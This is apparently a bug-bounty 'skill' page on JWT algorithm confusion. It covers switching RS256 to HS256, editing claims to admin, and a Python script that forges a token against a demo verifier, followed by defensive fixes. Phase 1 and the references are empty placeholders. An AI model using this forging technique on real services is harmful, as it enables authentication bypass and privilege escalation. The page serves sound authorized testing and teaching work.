jwt-algorithm-confusion

Identify and exploit Algorithm Confusion vulnerabilities in JSON Web Tokens (JWT). This skill details how to bypass signature verification by changing the signing algorithm from asymmetric (RS256) to symmetric (HS256) and using the public key as the symmetric secret.

By ShulkwiSEC. Updated 6/12/2026

---
name: jwt-algorithm-confusion
description: >
  Identify and exploit Algorithm Confusion vulnerabilities in JSON Web Tokens (JWT).
  This skill details how to bypass signature verification by changing the signing
  algorithm from asymmetric (RS256) to symmetric (HS256) and using the public key
  as the symmetric secret.
domain: cybersecurity
subdomain: bug-hunting
category: APIs
difficulty: advanced
estimated_time: "2 hours"
mitre_attack:
  tactics: [TA0006, TA0004]
  techniques: [T1550.004]
platforms: [web, api]
tags: [jwt, api-security, logic-flaws, authentication, cryptography, bug-hunting]
tools: [burp-suite, json-web-tokens]
version: "1.0"
author: CyberSkills-Elite
license: Apache-2.0
---

# JWT Algorithm Confusion

## When to Use

  • When testing APIs or web applications that use JWTs for session management or authentication.
  • To forge arbitrary JWTs (e.g., escalating to 'admin') when the application verifies tokens with an asymmetric algorithm (such as RS256) and its public key can be obtained.

## Prerequisites

  • Authorized scope and target URLs from bug bounty program
  • Burp Suite Professional (or Community) configured with browser proxy
  • Familiarity with OWASP Top 10 and common web vulnerability classes
  • SecLists wordlists for fuzzing and enumeration

## Workflow

### Phase 1: Reconnaissance (Finding the Public Key)

```bash
# Concept: JWT Algorithm Confusion
```

### Phase 2: Intercepting and Modifying the JWT Header

Intercept a valid token in Burp, decode the header, and change `alg` from `RS256` to `HS256`:

```json
{
  "alg": "HS256",
  "typ": "JWT"
}
```

### Phase 3: Modifying the Payload (Privilege Escalation)

Edit the claims to the identity you want to assume, for example by setting `role` to `admin`:

```json
{
  "user": "attacker",
  "role": "admin",
  "iat": 1716260400
}
```

### Phase 4: Signing the Forged JWT

Sign the tampered header and payload with HMAC-SHA256, using the exact bytes of the public key file as the secret:

```bash
# jwt_tool.py [ENCODED_HEADER].[ENCODED_PAYLOAD] -S hs256 -k public_key.pem
```
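Phases 2 to 4 carried through end to end, as an added Python example that is not part of the page and not jwt_tool's code. `PUBLIC_KEY_PEM` is a constructed stand-in for the key recovered in Phase 1 (not a real RSA key; only its exact bytes matter to the attack), and `vulnerable_verify` / `hardened_verify` are hypothetical server-side routines written to show the flaw and the fix. Standard library only, so the RS256 branch of each verifier is marked where a real RSA check would go.

```python
"""Forge an HS256 JWT keyed with an RSA public key's PEM bytes, then run it
through a verifier that dispatches on the token's own "alg" (the flaw) and
one that pins the algorithm server-side (the fix)."""
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the public key found in Phase 1. Not a real RSA
# key: the vulnerable path feeds these bytes straight into HMAC-SHA256, so
# what matters is matching the server's key bytes exactly (including the
# trailing newline), not having a valid modulus.
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAc0nstructedSampleKeyBytes\n"
    "-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decoded_header(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def forge_hs256(payload: dict, secret: bytes) -> str:
    """Phases 2-4 in one step: alg switched to HS256, tampered claims, HMAC
    over base64url(header).base64url(payload) keyed with `secret`."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(payload, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(parts).encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return ".".join(parts + [b64url_encode(sig)])


def vulnerable_verify(token: str, key_pem: str) -> dict:
    """The flaw: a single `key_pem` serves both branches and the token's own
    header picks the branch, so an HS256 token is checked with HMAC(key_pem)."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    signing_input = f"{h}.{p}".encode("ascii")
    if header.get("alg") == "HS256":
        expected = hmac.new(key_pem.encode(), signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            raise ValueError("bad signature")
        return json.loads(b64url_decode(p))
    if header.get("alg") == "RS256":
        # A real server performs RSA PKCS#1 v1.5 verification here. Omitted
        # in this stdlib-only demo; the attack never reaches this branch.
        raise NotImplementedError("RS256 verification needs an RSA library")
    raise ValueError("unsupported alg")


def hardened_verify(token: str, key_pem: str, expected_alg: str = "RS256") -> dict:
    """The fix: the server, not the token, chooses the algorithm, and any
    other value is rejected before a signature is ever computed."""
    header = decoded_header(token)
    if header.get("alg") != expected_alg:
        raise ValueError(f"alg {header.get('alg')!r} rejected, expected {expected_alg}")
    # RSA verification with key_pem used strictly as a public key would
    # follow here (omitted, stdlib-only demo).
    raise NotImplementedError("RS256 verification needs an RSA library")


def is_rejected(verify, token: str, key_pem: str) -> bool:
    """True when `verify` refuses the token at the alg or signature gate;
    False when the token passes that gate (including into the RS256 stub)."""
    try:
        verify(token, key_pem)
    except ValueError:
        return True
    except NotImplementedError:
        return False
    return False


FORGED = forge_hs256(
    {"user": "attacker", "role": "admin", "iat": 1716260400},
    PUBLIC_KEY_PEM.encode(),
)

if __name__ == "__main__":
    print("forged token:", FORGED)
    print("vulnerable server returns claims:", vulnerable_verify(FORGED, PUBLIC_KEY_PEM))
    print("hardened server rejects:", is_rejected(hardened_verify, FORGED, PUBLIC_KEY_PEM))
    # The key bytes must match exactly; dropping the PEM's trailing newline is
    # enough to produce a different HMAC and a rejected token.
    print("wrong key bytes rejected:",
          is_rejected(vulnerable_verify, FORGED, PUBLIC_KEY_PEM.rstrip("\n")))
```

The last check is the caveat that costs the most time in practice: the HMAC secret must be the byte-for-byte key material the server holds (PEM with the same line wrapping and trailing newline, or the raw DER if that is what the library passes to HMAC), so if the forged token is refused, try the alternative encodings of the same key before concluding the server is not vulnerable.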

## Decision Point 🔀

```mermaid
flowchart TD
    A[Forge JWT] --> B{Server Accepts?}
    B -->|Yes| C[Exploit API]
    B -->|No| D[Check None Alg]
    C --> E[Document Flaw]
```

## 🔵 Blue Team Detection & Defense

  • Enforce Algorithm Verification: the server fixes the expected algorithm (here RS256) in its own configuration and rejects any token whose header `alg` differs, before the signature is examined. The header's `alg` is attacker-controlled and must never select the verification routine.
  • Library Updates: use a JWT library version whose verify call requires the allowed algorithms to be passed explicitly and that distinguishes HMAC secrets from asymmetric keys by type, so an RSA public key cannot be handed to an HMAC routine.
  • Public Key Secrecy (Symmetric fallback): treat the public key as known to the attacker; not publishing it (e.g., via a JWKS endpoint) only raises the cost of Phase 1. The control is to make sure no symmetric fallback exists in which the RS256 key object doubles as the HS256 secret.

### Key Concepts

| Concept | Description |
|---|---|
| Algorithm confusion | The server verifies with whatever algorithm the token header claims, so the attacker chooses the verification routine. |
| RS256 | RSA with SHA-256: tokens are signed with the private key and verified with the public key. |
| HS256 | HMAC with SHA-256: one shared secret both signs and verifies. |
| Public key as symmetric secret | When the server passes its RSA public key into the HS256 path, that key, which the attacker also holds, becomes the signing secret. |

## Output Format

```text
JWT Algorithm Confusion - Assessment Report
============================================================
Target: [Target identifier]
Assessor: [Operator name]
Date: [Assessment date]
Scope: [Authorized scope]
MITRE ATT&CK: [Relevant technique IDs]

Findings Summary:
  [Finding 1]: [Severity] - [Brief description]
  [Finding 2]: [Severity] - [Brief description]

Detailed Results:
  Phase 1: [Phase name]
    - Result: [Outcome]
    - Evidence: [Screenshot/log reference]
    - Impact: [Business impact assessment]

  Phase 2: [Phase name]
    - Result: [Outcome]
    - Evidence: [Screenshot/log reference]
    - Impact: [Business impact assessment]

Risk Rating: [Critical/High/Medium/Low/Informational]
Recommendations:
  1. [Immediate remediation step]
  2. [Long-term hardening measure]
  3. [Monitoring/detection improvement]
```

## 📚 Shared Resources

For cross-cutting methodology applicable to all vulnerability classes, see:

## References
